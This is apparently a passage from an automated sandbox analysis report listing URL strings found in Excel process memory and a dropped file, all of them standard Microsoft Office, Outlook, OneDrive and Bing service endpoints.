Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/O
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmp String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesF
Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://onedrive.live.com
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://onedrive.live.com/embed?
Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmp String found in binary or memory: https://onedrive.live.comedu
Source: EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://osi.office.net
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: https://osi.office.netf
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: https://osi.office.netm
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: https://osi.office.netst
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: https://osi.office.netz
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://otelrules.azureedge.net
Source: EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://outlook.office.com
Source: EXCEL.EXE, 00000000.00000002.607398237.000000000F300000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://outlook.office.com/
Source: EXCEL.EXE, 00000000.00000003.413455560.000000000F457000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.607735341.000000000F457000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: https://outlook.office.comiUrl;
Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://outlook.office365.com
Source: EXCEL.EXE, 00000000.00000002.607398237.000000000F300000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://outlook.office365.com/
Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmp String found in binary or memory: https://outlook.office365.com/0
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: EXCEL.EXE, 00000000.00000002.608505078.0000000012D5D000.00000004.00000001.sdmp String found in binary or memory: https://outlook.office365.com/api/v1.0/me/ActivitiesMBI_SSL
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/3
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://pages.store.office.com/review/query
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: https://pages.store.office.com/review/query%
Source: EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: EXCEL.EXE, 00000000.00000003.413455560.000000000F457000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.607735341.000000000F457000.00000004.00000001.sdmp String found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptionslL
Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json98
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmp String found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13db8
Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: https://powerlift-frontdesk.acompli.net9
Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://powerlift.acompli.net
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: https://powerlift.acompli.netm
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmp String found in binary or memory: https://res.getmicrosoftkey.com/api/redemptioneventsx
Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://roaming.edog.
Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://settings.outlook.com
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: https://settings.outlook.coml
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://shell.suite.office.com:1443
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://skyapi.live.net/Activity/
Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/workA
Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://staging.cortana.ai
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: https://staging.cortana.ai)
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: https://staging.cortana.aiP
Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://store.office.cn/addinstemplate
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://store.office.de/addinstemplate
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: https://substrate.office.com
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: https://substrate.office.com(
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: https://substrate.office.com/Todo-Internal.ReadWriten
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://substrate.office.com/search/api/v2/init
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: https://substrate.office.com/search/api/v2/initl
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: https://substrate.office.comD
Source: EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: https://substrate.office.comP
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: https://substrate.office.coms
Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFilev;C9
Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://tasks.office.com
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: https://tasks.office.comts
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: https://tellmeservice.osi.office.netst
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: EXCEL.EXE, 00000000.00000003.413455560.000000000F457000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.607735341.000000000F457000.00000004.00000001.sdmp String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html4
Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devicesb
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://web.microsoftstream.com/video/
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://webshell.suite.office.com
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: https://webshell.suite.office.coma
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://wus2.contentsync.
Source: EXCEL.EXE, 00000000.00000003.413455560.000000000F457000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.607735341.000000000F457000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://wus2.pagecontentsync.
Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://www.odwebp.svc.ms
